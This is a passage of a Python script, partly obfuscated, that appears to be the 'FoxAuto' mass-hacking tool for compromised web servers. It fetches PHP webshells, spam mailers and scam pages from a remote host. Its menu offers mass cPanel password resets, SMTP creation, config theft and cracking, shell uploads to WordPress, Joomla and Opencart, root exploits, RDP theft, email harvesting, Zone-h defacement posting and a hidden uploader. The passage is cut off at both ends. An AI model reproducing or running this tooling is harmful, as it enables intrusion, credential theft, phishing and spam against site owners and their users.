_______________________________zqzpnanfxldd={str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))])):str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]))}
________________________________dhapbpidytke=requests.post(_________________bpssooleeakr.format(________________________sdjxilhjdjtv, dom , to , version ), data =_______________________________zqzpnanfxldd, headers = headers , timeout =((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))))
_________________________________uhrqfcnavgmb=________________________________dhapbpidytke.status_code
__________________________________vsbiobxphiqc=content_Fox(________________________________dhapbpidytke)
except :
__________________________________vsbiobxphiqc=str("".join(chr(__RSV) for __RSV in []))
_________________________________uhrqfcnavgmb=((()==[])+(()==[]))
if (int(_________________________________uhrqfcnavgmb)==((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+(___________________________________wwyksdhmospv<<(_oaowtpxvobjz**_oaowtpxvobjz))+(____________________________________liacevohsqep<<(_oaowtpxvobjz**_oaowtpxvobjz)))):
try :
_____________________________________ekmlqimmjqhr403=requests.get(__________________mkgflhargygg.format(________________________sdjxilhjdjtv), headers = headers , timeout =((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))))
except :
_____________________________________ekmlqimmjqhr403=requests.get(__________________mkgflhargygg.format(________________________sdjxilhjdjtv), headers = headers , timeout =(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm))
try :
________________________________dhapbpidytke=requests.post(_________________bpssooleeakr.format(________________________sdjxilhjdjtv, dom , to , version ), data =_______________________________zqzpnanfxldd, headers = headers , timeout =((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))))
__________________________________vsbiobxphiqc=content_Fox(________________________________dhapbpidytke)
except :
__________________________________vsbiobxphiqc=str("".join(chr(__RSV) for __RSV in []))
if (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))])) in __________________________________vsbiobxphiqc):
break
elif (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))])) in __________________________________vsbiobxphiqc) and str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])) in ________________________sdjxilhjdjtv:
________________________sdjxilhjdjtv=________________________sdjxilhjdjtv.replace(str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])),str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])))
break
return ________________________sdjxilhjdjtv
except :
return ________________________sdjxilhjdjtv
def getFile(name, ty):
try:
def download_url(name, ty, chunk_size=128):
try:
r = requests.get('https://{}/_@files/{}/{}'.format(dom, ty, name), stream=True, headers=headers, timeout=180)
with open('Files/' + name, 'wb') as fd:
for chunk in r.iter_content(chunk_size=chunk_size):
fd.write(chunk)
return open('Files/' + name, 'rb')
except:
return False
def checkFile(name, ty):
try:
if(sys.version_info[0] < 3):
src = str(open('Files/' + name, 'rb').read())
else:
src = str(open('Files/' + name, 'rb').read().decode('cp866'))
if(ty == 'php' and ('FoxAuto' in src or 'tjwlltii' in src)): return True
elif(ty == 'zip_v6' and ('<title>Site Maintenance</title>' not in src and src != '')): return True
return False
except:
return False
newpath = r'Files'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
for dom in ____________gwbahwaesaqz :
if (ty == 1):
src = download_url(name, 'php')
if(src is False): continue
if(checkFile(name, 'php') is True): break
elif(ty == 2):
src = download_url(name, 'zip_v6')
if(src is False): continue
if(checkFile(name, 'zip_v6') is True): break
return src
except:
return False
def FoxAuto():
try :
main()
if(__________xrwpikstqlrz() is False): return
shellFox()
try:
sites = open(sys.argv[1], 'r')
except :
yList = str(input_Fox('\n Your List --> : '))
if (not os.path.isfile(yList)):
print("\n {}({}) File does not exist.\n".format(fr, yList))
return
sites = open(yList, 'r')
getToken = shell_Fox
print('\n {}If your list is {}Shells{}/{}UPloaders{} choose from 1-21 :'.format(fc, fg, fc, fg, fc))
print(' [01] {}Mass Reset Passowrd {}cPanel'.format(fw, fr))
print(' [02] {}Mass Finder SMTP {}+{} Create SMTP'.format(fw, fg, fw))
print(' [03] {}Mass Finder {}Linux{}/{}Windows{}, {}cPanel{}/vHosts/Root {}[PWD|UNAME]'.format(fw, fg, fw, fr, fw, fr, fw, fr))
print(" [04] {}Mass Finder Accesshash {}Reseller {}+{} .my.cnf {}cPanel {}[DEV]".format(fw, fr, fg, fw, fr, fg))
print(" [05] {}Mass Get Config ({}cPanel{}/vHosts) server {}+{} Config{}404 {}+{} Config{}CFS".format(fw, fr, fw, fg, fw, fr, fg, fw, fg))
print(" [06] {}Mass Get Config {}+ {}Crack {}cPanel{}/{}WHM {}[DEV]".format(fw, fg, fw, fr, fw, fc, fg))
print(' [07] {}Mass Get Config {}+{} Upload Shell on {}WordPress{}/{}Joomla{}/{}Opencart {}[DEV]'.format(fw, fg, fw, fg, fw, fr, fw, fc, fg))
print(' [08] {}Mass Get {}Root{} by {}./dirty [PHP/BASH]'.format(fw, fg, fw, fr))
print(' [09] {}Mass Get {}RDP{} from {}Windows {}server'.format(fw, fg, fw, fr, fw))
print(" [10] {}Mass Get Domains-List".format(fw))
print(" [11] {}Mass Get Emails-List".format(fw))
print(" [12] {}Mass Get Config {}+ {}Emails-List".format(fw, fg, fw))
print(' [13] {}Mass Upload Mailer {}[Random]'.format(fw, fr))
print(' [14] {}Mass Upload File {}[Random]'.format(fw, fr))
print(' [15] {}Mass Upload Index {}+{} Post in {}Zone-h {}[DEV]'.format(fw, fg, fw, fr, fg))
print(' [16] {}Mass Upload {}Scam-Page{}/{}Zip-file {}+{} UNZip'.format(fw, fg, fw, fr, fg, fw))
print(" [17] {}Mass Chack if Sending mail is Working or not! {}[Results delivery]".format(fw, fr))
print(' [18] {}Mass Reports replacement {}Olux{}/{}xLeet{}/{}Other'.format(fw, fg, fw, fr, fw, fc))
print(" {}[{}19{}] {}From any{} Shell/UPloader, MASS Upload File {}Shell{}/{}Mailer {}[DEV]".format(fw, fg, fw, fg, fw, fg, fw, fr, fg))
print(' [20] {}Reset Passowrd {}cPanel {}+{} Finder/Create SMTP {}[together]'.format(fw, fr, fg, fw, fr))
print(' [21] {}01 {}+{} 02 {}+{} 04 {}+{} 06 {}+{} 08 {}[All of them together]'.format(fw, fg, fw, fg, fw, fg, fw, fg, fw, fr))
time.sleep(1.5)
print('\n {}elseif your list is {}cPanels{} choose from 22-26 :'.format(fc, fr, fc))
print(' [22] {}Mass Finder SMTP {}+{} Create SMTP'.format(fw, fg, fw))
print(" [23] {}MASS Upload File {}Olux{}/{}xLeet{}/{}Other{} Shell/Mailer".format(fw, fg, fw, fr, fw, fc, fw))
print(' [24] {}Mass Upload {}Scam-Page{}/{}Zip-file {}+{} UNZip'.format(fw, fg, fw, fr, fg, fw))
print(" [25] {}Mass Chack if Sending mail is Working or not! {}[Results delivery]".format(fw, fr))
print(' [26] {}Mass Reports replacement {}Olux{}/{}xLeet{}/{}Other'.format(fw, fg, fw, fr, fw, fc))
time.sleep(1.5)
print('\n {}elseif your list is {}Wordpress{}/{}Joomla{}/{}Opencart{}/{}Drupal{} panels choose 27 :'.format(fc, fg, fc, fr, fw, fc, fw, fr, fc))
print(" [27] {}Mass login {}Wordpress{}/{}Joomla{}/{}Opencart{}/{}Drupal{} panel {}+{} UPload Shell".format(fw, fg, fw, fr, fw, fc, fw, fr, fw, fg, fw))
time.sleep(1.5)
print('\n {}else :'.format(fc))
print(" [28] {}Explanation ({}YouTube{}) {}|| {}Request more {}features{} and {}tools".format(fw, fr, fw, fr, fw, fg, fw ,fg))
print(" [29] {}About Script {}&{} Check Update".format(fg, fr, fg))
print(" {}[{}00{}] {}Exit".format(fw, fr, fw, fr))
try :
w = int(input_Fox('\n --> : '))
except:
print("\n {}Choose from 0-29, please.\n".format(fr))
return
print('')
cia = getToken
if (w == 0) :
print(" {}Go to hell :P.\n".format(fr))
return
if (w > 29) :
print("\n {}Choose from 0-29, please.\n".format(fr))
return
if (w == 29) :
about()
return
if (w == 28) :
Request()
return
newpath = r'Results'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
if (w == 1):
print(' {}[{}?{}] {}Choose the procedure that suits you.\n'.format(fw, fr, fw, fc))
print(' [1] {}Automatic {}[Default]'.format(fw, fg))
print(' [2] {}Semi-Automatic'.format(fw))
try:
tyRest = int(input_Fox('\n --> : '))
except:
tyRest = 1
print('')
if (tyRest != 1 and tyRest != 2):
tyRest = 1
elif (tyRest == 2):
email = str(input_Fox(' Your Email --> : '))
print('')
if (w == 18 or w == 26):
print(' {}[{}?{}] {}Choose the procedure that suits you.\n'.format(fw, fr, fw, fc))
print(' [1] {}Automatic {}[With Proofs]'.format(fw, fg))
print(' [2] {}Semi-Automatic {}[Just Form]'.format(fw, fr))
try:
tyReport = int(input_Fox('\n --> : '))
except:
tyReport = 1
print('')
getFile('unzipper.txt', 1)
if (tyReport != 1 and tyReport != 2):
tyReport = 1
elif (tyReport == 2):
email = str(input_Fox(' Your Email --> : '))
print('')
q = str(input_Fox(' {}[{}?{}] {}Do you want Hidden uploader (?Ghost=send) in test.php ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg,fw, fr, fw)))
print('')
global testSend
if (q.lower() == 'y' or q.lower() == 'yes'):
testSend = testSendB
else :
testSend = testSendA
if (w == 13) :
q = str(input_Fox(' {}[{}?{}]{} Do you want the encrypted version of Leaf PHPMailer ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
if (q.lower() == 'n' or q.lower() == 'no') :
q = 0
else :
q = 1
if (q == 0) :
srcMailer = 'Files/leafmailer2.8.txt'; getFile('leafmailer2.8.txt', 1)
elif (q == 1):
srcMailer = 'Files/leafmailer2.8-encode.txt'; getFile('leafmailer2.8-encode.txt', 1)
print('')
if (w == 15) :
nameF = str(input_Fox(' Your Index\'s name --> : '))
if (not os.path.isfile(nameF)):
print("\n {}({}) File does not exist.\n".format(fr, nameF))
return
fileSrc = nameF
print('\n {}[{}?{}] {}Choose what you want.\n'.format(fw, fr, fw, fc))
print(' [1] {}Index with the same name, like => {}http://domain.com/{}'.format(fw, fr, nameF))
print(' [2] {}Index in the main index, like => {}http://domain.com/'.format(fw, fr))
try :
tyUP = int(input_Fox('\n --> : '))
except:
tyUP = 1
if (tyUP != 1 and tyUP != 2) :
tyUP = 1
q = str(input_Fox('\n {}[{}?{}]{} Do you want post in Zone-h ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
if (q.lower() == 'n' or q.lower() == 'no'):
q = 0
nameA = ''
else:
q = 1;requests.get('http://www.zone-h.org/notify/single', headers=headers, verify=False, timeout=30)
nameA = str(input_Fox('\n Attacker name --> : '))
print('')
if (w == 19 or w == 23 or w == 14 or w == 7 or w == 27) :
print(' {}[{}?{}] {}Choose what you want to upload it.\n'.format(fw, fr, fw, fc))
print(' [1] {}Fox WSO {}[It is accepted in all sites-Shop]'.format(fw, fg))
print(' [2] {}OLux Shell'.format(fw))
print(' [3] {}xLeet Shell'.format(fw))
print(' [4] {}Leaf PHPMailer'.format(fw))
print(' [5] {}Other file'.format(fr))
try :
tyShell = int(input_Fox('\n --> : '))
except:
print("\n {}Choose from 1-5, please.\n".format(fr))
return
if (tyShell == 4):
q = str(input_Fox('\n {}[{}?{}]{} Do you want the encrypted version of Leaf PHPMailer ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
if (q.lower() == 'n' or q.lower() == 'no') :
q = 0
else:
q = 1
if (tyShell == 1) :
srcShell = 'Files/FoxWSO-full.txt'; getFile('FoxWSO-full.txt', 1)
elif (tyShell == 2) :
srcShell = 'Files/olux-shell.txt'; getFile('olux-shell.txt', 1)
elif (tyShell == 3) :
srcShell = 'Files/xleet-shell.txt'; getFile('xleet-shell.txt', 1)
elif (tyShell == 4 and q == 0) :
srcShell = 'Files/leafmailer2.8.txt'; getFile('leafmailer2.8.txt', 1)
elif (tyShell == 4 and q == 1):
srcShell = 'Files/leafmailer2.8-encode.txt'; getFile('leafmailer2.8-encode.txt', 1)
elif (tyShell == 5) :
nameF = str(input_Fox('\n Your File\'s name --> : '))
if (not os.path.isfile(nameF)):
print("\n {}({}) File does not exist.\n".format(fr, nameF))
return
srcShell = nameF
else:
print("\n {}Choose from 1-5, please.\n".format(fr))
return
if (w == 14 or w == 19):
